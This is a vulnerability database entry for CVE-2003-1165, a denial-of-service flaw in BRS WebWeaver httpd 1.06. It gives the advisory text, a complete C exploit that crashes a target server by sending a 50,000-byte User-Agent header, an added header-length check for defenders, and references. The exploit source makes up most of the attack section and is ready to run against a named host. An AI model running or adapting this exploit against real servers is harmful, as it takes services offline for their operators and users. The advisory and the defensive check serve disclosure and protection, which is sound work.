BRS WebWeaver httpd `User-Agent` Remote Buffer Overflow Vulnerability

Vulnerability ID 1107568 Vulnerability type Other
Published 2003-11-01 Updated 2005-10-20
CVE ID CVE-2003-1165
CNNVD-ID CNNVD-200312-151
Platform Multiple CVSS score 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/23325
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-151
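|Vulnerability details
BRS WebWeaver is an integrated, small and fast HTTP and FTP server that provides directory protection and runs on Windows 9x/NT. BRS WebWeaver httpd does not correctly handle the user-supplied `User-Agent` field, and a remote attacker can use this flaw to cause a denial of service against the server. If the `User-Agent` field of an HTTP request contains an overly long string, the program can crash while BRS WebWeaver httpd parses it and stop responding entirely, resulting in a denial of service.
|Exploit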
source: http://www.securityfocus.com/bid/8947/info

It has been reported that BRS WebWeaver may be prone to a denial of service issue that may allow a remote attacker to cause the software to crash or hang. The issue presents itself when the server receives a request containing a large string value for the `User-Agent` parameter. 

Successful exploitation of this issue may allow an attacker to cause the software to crash or hang.

BRS WebWeaver versions 1.06 and prior have been reported to be prone to this issue.

/*
 *  BRS WebWeaver v.1.06 remote DoS exploit
 *
 * -d4rkgr3y [[email protected]]
 *
 */

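#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define port 80

int main(int argc, char **argv) {
        struct hostent *hs;
        struct sockaddr_in sock;
        int sockfd, i;
        const int c = 50000;    /* length of the User-Agent value */
        /* The unused tail of the array is zero-filled, which the
           strlen()-based appends below rely on. */
        char request[50150] =
                "GET /m00-r0cz HTTP/1.0\n"
                "Accept: */*\n"
                "Accept-Language: jp\n"
                "Accept-Encoding: gzip, deflate\n"
                "Host: m00security.org\n"
                "User-Agent: ";
        printf("BRS WebWeaver v.1.06 remote DoS exploit\n\n");

        if (argc!=2){
                printf("usage\n %s hostname\n\n",argv[0]);
                exit(1);
        }

        //memset((request+98),0x41,c);
        /* fill the User-Agent value with c bytes of 'A' */
        memset((request+strlen(request)),0x41,c);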
        /* l33t ;] */
        request[strlen(request)] = 0x0a;
        request[strlen(request)] = 0x43;
        request[strlen(request)] = 0x6f;
        request[strlen(request)] = 0x6e;
        request[strlen(request)] = 0x6e;
        request[strlen(request)] = 0x65;
        request[strlen(request)] = 0x63;
        request[strlen(request)] = 0x74;
        request[strlen(request)] = 0x69;
        request[strlen(request)] = 0x6f;
        request[strlen(request)] = 0x6e;
        request[strlen(request)] = 0x3a;
        request[strlen(request)] = 0x20;
        request[strlen(request)] = 0x4b;
        request[strlen(request)] = 0x65;
        request[strlen(request)] = 0x65;
        request[strlen(request)] = 0x70;
        request[strlen(request)] = 0x2d;
        request[strlen(request)] = 0x41;
        request[strlen(request)] = 0x6c;
        request[strlen(request)] = 0x69;
        request[strlen(request)] = 0x76;
        request[strlen(request)] = 0x65;
        request[strlen(request)] = 0x0a;
        request[strlen(request)] = 0x0a;

        bzero(&sock, sizeof(sock));
        sock.sin_family = AF_INET;
        sock.sin_port = htons(port);
        if ((sock.sin_addr.s_addr=inet_addr(argv[1]))==-1) {
                if ((hs=gethostbyname(argv[1]))==NULL) {
                        printf("damn");
                        exit(1);
                }
                printf("~ Host resolved.\n");
                sock.sin_family = hs->h_addrtype;
                memcpy((caddr_t)&sock.sin_addr.s_addr,hs->h_addr,hs->h_length);
        }
        if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
                perror("damn");  exit(0);
        }

        if(connect(sockfd, (struct sockaddr *)&sock, sizeof(sock)) < 0){
                perror("damn"); exit(0);
        }
        printf("~ Socket connected\n");
        printf("~ Sending evil code... ");
        write(sockfd,request,strlen(request));
        printf("done\n\n");
        close(sockfd);
}
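
Added example, not part of the original advisory or of BRS WebWeaver's code: a length check a server can apply to raw header lines before any parsing or copying, so that a request like the one above is rejected instead of processed. `check_headers`, `is_ua_line` and `MAX_HEADER_LINE` are hypothetical names, and the 8192-byte limit is an assumption.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

#define MAX_HEADER_LINE 8192  /* assumed per-line limit, not a WebWeaver value */

enum hdr_verdict { HDR_OK, HDR_LINE_TOO_LONG, HDR_INCOMPLETE };

/* Case-insensitive test for a line that starts with "User-Agent:". */
static int is_ua_line(const char *line, size_t n)
{
    static const char name[] = "user-agent:";
    size_t i, k = sizeof(name) - 1;
    if (n < k)
        return 0;
    for (i = 0; i < k; i++)
        if (tolower((unsigned char)line[i]) != name[i])
            return 0;
    return 1;
}

/*
 * Scan a raw, not NUL-terminated request buffer line by line, accepting CRLF
 * and the bare LF used by the request above. Nothing is copied, so a long
 * header cannot overrun a fixed buffer. *ua_hit is set when the oversized
 * line is the User-Agent header (useful for logging and alerting).
 */
enum hdr_verdict check_headers(const char *buf, size_t len, int *ua_hit)
{
    size_t start = 0;
    *ua_hit = 0;
    while (start < len) {
        const char *line = buf + start;
        const char *nl = memchr(line, '\n', len - start);
        size_t n = nl ? (size_t)(nl - line) : len - start;
        if (n > MAX_HEADER_LINE) {      /* checked before a terminator arrives */
            *ua_hit = is_ua_line(line, n);
            return HDR_LINE_TOO_LONG;
        }
        if (nl == NULL)
            return HDR_INCOMPLETE;      /* caller reads more data */
        if (n > 0 && line[n - 1] == '\r')
            n--;                        /* tolerate CRLF */
        if (n == 0)
            return HDR_OK;              /* blank line ends the header block */
        start += (size_t)(nl - line) + 1;
    }
    return HDR_INCOMPLETE;
}
```

A caller would answer `HDR_LINE_TOO_LONG` with an error response and close the connection; logging `ua_hit` together with the source address gives a detection signal for this request pattern.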
|References

Source: XF
Name: brswebweaver-useragent-bo(13571)
Link: http://xforce.iss.net/xforce/xfdb/13571
Source: BID
Name: 8947
Link: http://www.securityfocus.com/bid/8947
Source: BUGTRAQ
Name: 20031101 BRS WebWeaver 1.06 remote DoS vulnerability
Link: http://www.securityfocus.com/archive/1/343111
Source: NSFOCUS
Name: 5624
Link: http://www.nsfocus.net/vulndb/5624
